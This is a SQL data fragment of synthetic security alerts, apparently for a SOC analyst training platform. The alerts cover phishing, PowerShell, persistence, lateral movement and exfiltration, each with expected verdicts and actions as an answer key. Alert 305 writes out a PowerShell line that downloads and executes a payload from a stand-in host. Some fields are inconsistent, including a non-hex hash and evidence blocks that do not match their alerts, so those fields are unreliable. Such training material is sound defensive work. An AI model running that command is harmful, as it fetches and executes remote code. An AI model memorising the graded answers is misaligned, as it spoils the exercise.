(297, 'Manipulation of ATM Withdrawal Limits and SWIFT Gateway', 'high', 'Transaction Monitoring System', 'Attackers have manipulated ATM withdrawal limits and initiated unauthorized SWIFT transactions, leading to substantial financial losses. This step marks the culmination of their heist.', 'Manipulation', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"ATM-TRANS-0004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"ATM Withdrawal Limit Manipulation\",\"transaction_id\":\"SWIFT-TRANS-8976\",\"file_hash\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"affected_account\":\"1234567890\",\"amount\":\"50000\",\"currency\":\"USD\"}', '2025-12-31 15:23:56', '2026-02-27 02:57:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP for financial fraud operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal bank system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin account used during unauthorized transaction manipulations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for financial fraud.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit 
Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(302, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on a host using a known LOLBin technique. The executed script attempted to connect to a known Command and Control (C2) server.', 'Malware', 'T1218', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T15:24:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"malicious-c2.example.com\"}', '2026-01-01 23:58:23', '2026-02-17 22:30:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process used a known LOLBin for execution and attempted to communicate with a malicious C2 server, confirming the malware presence.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(303, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email was received containing a malicious link designed to harvest credentials. The email used a spoofed domain similar to a trusted one.', 'Phishing', 'T1566', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"asmith\",\"hostname\":\"email-server\",\"email_sender\":\"admin@trusfed-business.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-01-01 23:41:20', '2026-03-16 03:19:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"admin@trusfed-business.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing a legitimate business\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing site designed to steal credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was confirmed to be a phishing attempt due to the malicious link and spoofed domain, matching known phishing patterns.\"}', 'Advanced', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious Link Detected\",\"date\":\"2026-02-01T20:32:18.902Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(304, 'Spear Phishing Email Detected', 'medium', 'Email Gateway', 'A spear phishing email from a malicious source, disguised as a communication from a trusted partner, was detected targeting an employee in the finance department. The email contained a malicious attachment and a suspicious link.', 'Phishing', 'T1566.002', 1, 'investigating', 225, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"email_id\":\"1234567890\",\"from\":\"finance.partner@maliciousdomain.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Urgent: Q3 Financial Report\",\"attachment\":\"Q3_Report.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://maliciousdomain.com/securelogin\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\"}', '2026-01-02 04:27:59', '2026-03-16 03:07:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing URL targeting credentials\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.903Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(305, 'Suspicious PowerShell Execution', 'high', 'EDR', 'A PowerShell script was executed on the compromised system. This script is suspected to be used to establish a foothold and download additional malicious payloads. The execution follows a successful phishing attempt that targeted user john.doe.', 'Execution', 'T1059.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4688,\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_script.ps1\"}', '2026-01-02 04:27:59', '2026-03-04 01:50:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This hash is associated with a known malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious script naming conventions.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account that was targeted during the 
attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(306, 'Persistence Mechanism Established', 'high', 'Endpoint Logs', 'The attacker has established a persistence mechanism on the compromised system by creating a scheduled task and modifying registry keys. This ensures the malicious software remains active and reinitiates upon system restart.', 'Persistence', 'T1050 - New Service', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_type\":\"registry and scheduled task modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"affected_user\":\"john.doe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"scheduled_task\":{\"task_name\":\"SystemUpdater\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\taskhost.exe\",\"creation_time\":\"2023-10-12T14:40:00Z\"},\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-02 04:27:59', '2026-03-04 01:51:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines as malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"taskhost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File 
Analysis\",\"verdict\":\"suspicious\",\"details\":\"Mimics legitimate Windows process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(307, 'Unauthorized Lateral Movement Detected', 'high', 'Network Logs', 'The attacker used stolen credentials to move laterally across the network, probing for systems hosting geological data repositories. The lateral movement was detected from internal IP 192.168.1.15 to 192.168.1.20 using compromised credentials of user \'j.doe\'.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"192.168.1.20\",\"username\":\"j.doe\",\"action\":\"Lateral Movement\",\"result\":\"Success\",\"external_ip\":\"203.0.113.45\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\geodata\\\\confidential_report.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-02 04:27:59', '2026-03-04 01:53:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal system hosting valuable data.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this file 
hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(308, 'Data Exfiltration Attempt', 'high', 'Firewall', 'An attempt was detected to transfer sensitive geological data out of the corporate network. The attacker, believed to be APT34, is using encrypted channels to exfiltrate data to a command and control server.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"src_ip\":\"10.1.2.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_sent\":1048576,\"bytes_received\":512,\"filename\":\"geo_data_export.zip\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"username\":\"jdoe\",\"url\":\"https://malicious-c2.com/exfil\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-02 04:27:59', '2026-03-04 01:54:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT34 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious file hash associated with data exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2.com/exfil\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"URL associated with APT34\'s exfiltration operations\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"geo_data_export.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file likely to contain 
geological data\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(313, 'Suspicious PowerShell Script Execution Detected', 'high', 'Endpoint', 'A PowerShell script was executed on a critical server with unusual parameters that could be indicative of a malicious payload or reconnaissance activity.', 'Process Execution', 'T1059.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-14T11:35:45Z\",\"hostname\":\"finance-server-03\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.50\\\\share\\\\suspicious.ps1\",\"file_hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"parent_process\":\"explorer.exe\",\"pid\":4567,\"ppid\":4123,\"integrity_level\":\"High\",\"network_connections\":\"None\",\"additional_info\":{\"script_block_logging\":\"Enabled\",\"module_logging\":\"Enabled\"}}', '2026-01-02 15:31:52', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"152.82.254.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 152.82.254.41 reported 141 times for malicious activity. 
Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
